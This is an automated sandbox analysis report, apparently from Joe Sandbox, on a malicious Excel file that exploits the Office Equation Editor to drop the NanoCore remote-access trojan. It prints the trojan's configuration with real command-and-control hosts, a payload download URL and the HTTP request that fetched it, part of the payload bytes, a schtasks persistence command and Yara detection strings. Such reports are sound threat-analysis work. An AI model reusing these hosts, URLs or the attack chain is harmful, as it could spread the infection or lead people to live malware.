Loading ...

Play interactive tourEdit tour

Analysis Report PR0078966.xlsx

Overview

General Information

Sample Name:PR0078966.xlsx
Analysis ID:385365
MD5:f5921b095b5db6eaa0cccb1cc9874a5b
SHA1:db7fec49af3b772abf7ffa409fa186860447f375
SHA256:5f5ec4a144dce14821a36549141718418145e253974eaae902c8acc73a514839
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1468 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 1100 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2344 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6A647FD057FD6A0B85C644D928125EB4)
      • schtasks.exe (PID: 2760 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 824 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
  • smtpsvc.exe (PID: 1544 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x11b3c5:$x1: NanoCore.ClientPluginHost
  • 0x14dbe5:$x1: NanoCore.ClientPluginHost
  • 0x11b402:$x2: IClientNetworkHost
  • 0x14dc22:$x2: IClientNetworkHost
  • 0x11ef35:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
  • 0x151755:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x11b12d:$a: NanoCore
    • 0x11b13d:$a: NanoCore
    • 0x11b371:$a: NanoCore
    • 0x11b385:$a: NanoCore
    • 0x11b3c5:$a: NanoCore
    • 0x14d94d:$a: NanoCore
    • 0x14d95d:$a: NanoCore
    • 0x14db91:$a: NanoCore
    • 0x14dba5:$a: NanoCore
    • 0x14dbe5:$a: NanoCore
    • 0x11b18c:$b: ClientPlugin
    • 0x11b38e:$b: ClientPlugin
    • 0x11b3ce:$b: ClientPlugin
    • 0x14d9ac:$b: ClientPlugin
    • 0x14dbae:$b: ClientPlugin
    • 0x14dbee:$b: ClientPlugin
    • 0x11b2b3:$c: ProjectData
    • 0x14dad3:$c: ProjectData
    • 0x11bcba:$d: DESCrypto
    • 0x14e4da:$d: DESCrypto
    • 0x123686:$e: KeepAlive
    Click to see the 13 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    4.2.vbc.exe.389c238.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x429ad:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x429ea:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x4651d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    4.2.vbc.exe.389c238.4.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x42725:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x429ad:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x43fe6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x43fda:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x44e8b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x4ac42:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    • 0x429d7:$s5: IClientLoggingHost
    4.2.vbc.exe.389c238.4.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      4.2.vbc.exe.389c238.4.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0x42715:$a: NanoCore
      • 0x42725:$a: NanoCore
      • 0x42959:$a: NanoCore
      • 0x4296d:$a: NanoCore
      • 0x429ad:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x42774:$b: ClientPlugin
      • 0x42976:$b: ClientPlugin
      • 0x429b6:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x4289b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x432a2:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      7.2.RegSvcs.exe.34f1a55.9.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xb184:$x1: NanoCore.ClientPluginHost
      • 0x23c50:$x1: NanoCore.ClientPluginHost
      • 0xb1b1:$x2: IClientNetworkHost
      • 0x23c7d:$x2: IClientNetworkHost
      Click to see the 34 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 13.235.115.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1100, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1100, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exe
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 824, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
      Sigma detected: Scheduled temp file as task from temp locationShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2344, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp', ProcessId: 2760

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://covid19vaccinations.hopto.org/nass.exeAvira URL Cloud: Label: malware
      Found malware configurationShow sources
      Source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exeReversingLabs: Detection: 18%
      Source: C:\Users\user\AppData\Roaming\blFUun.exeReversingLabs: Detection: 18%
      Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 18%
      Multi AV Scanner detection for submitted fileShow sources
      Source: PR0078966.xlsxVirustotal: Detection: 28%Perma Link
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORY
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exeJoe Sandbox ML: detected
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\blFUun.exeJoe Sandbox ML: detected
      Source: 7.2.RegSvcs.exe.d10000.4.unpackAvira: Label: TR/NanoCore.fadte
      Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\System.pdbX source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: indows\System.pdbpdbtem.pdblog source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: T3UpC:\Windows\System.pdb source: RegSvcs.exe, 00000007.00000002.2371635482.0000000004D2C000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: 72s.pdb source: RegSvcs.exe, 00000007.00000002.2371200857.00000000046AD000.00000004.00000001.sdmp
      Source: Binary string: indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb:\B source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2369796827.00000000002B8000.00000004.00000020.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2370178506.0000000000C06000.00000004.00000040.sdmp
      Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2180059913.0000000001090000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2371068879.0000000004580000.00000002.00000001.sdmp
      Source: excel.exeMemory has grown: Private usage: 4MB later: 71MB
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
      Source: global trafficDNS query: name: covid19vaccinations.hopto.org
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: nassiru1155.ddns.net
      Source: Malware configuration extractorURLs: 79.134.225.30
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: nassiru1155.ddns.net
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 79.134.225.30:1144
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:31:52 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16Last-Modified: Mon, 12 Apr 2021 07:38:49 GMTETag: "c1600-5bfc19ac18ac0"Accept-Ranges: bytesContent-Length: 792064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 09 f9 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a8 08 00 00 6c 03 00 00 00 00 00 6a c7 08 00 00 20 00 00 00 e0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c7 08 00 4f 00 00 00 00 e0 08 00 34 69 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 a7 08 00 00 20 00 00 00 a8 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 34 69 03 00 00 e0 08 00 00 6a 03 00 00 aa 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0c 00 00 02 00 00 00 14 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c c7 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac de 00 00 cc d9 00 00 03 00 00 00 01 00 00 06 78 b8 01 00 a0 0e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 23 00 00 0a 28 24 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 25 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 02 17 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 16 28 2a 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 18 02 00 06 28 2b 00 00 0a 00 2a 26 00 02 28 2c 00 00 0a 00 2a ce 73 2d 00 00 0a 80 01 00 00 04 73 2e 00 00 0a 80 02 00 00 04 73 2f 00 00 0a 80 03 00 00 04 73 30 00 00 0a 80 04 00 00 04 73 31 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 35 00 00 0a 0
      Source: Joe Sandbox ViewIP Address: 79.134.225.30 79.134.225.30
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
      Source: global trafficHTTP traffic detected: GET /nass.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.30
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A992A851.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /nass.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: covid19vaccinations.hopto.org
      Source: vbc.exe, 00000004.00000002.2184312053.0000000005720000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2371654641.0000000004D30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: vbc.exe, 00000004.00000002.2184312053.0000000005720000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2371654641.0000000004D30000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
      Source: RegSvcs.exe, 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORY
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
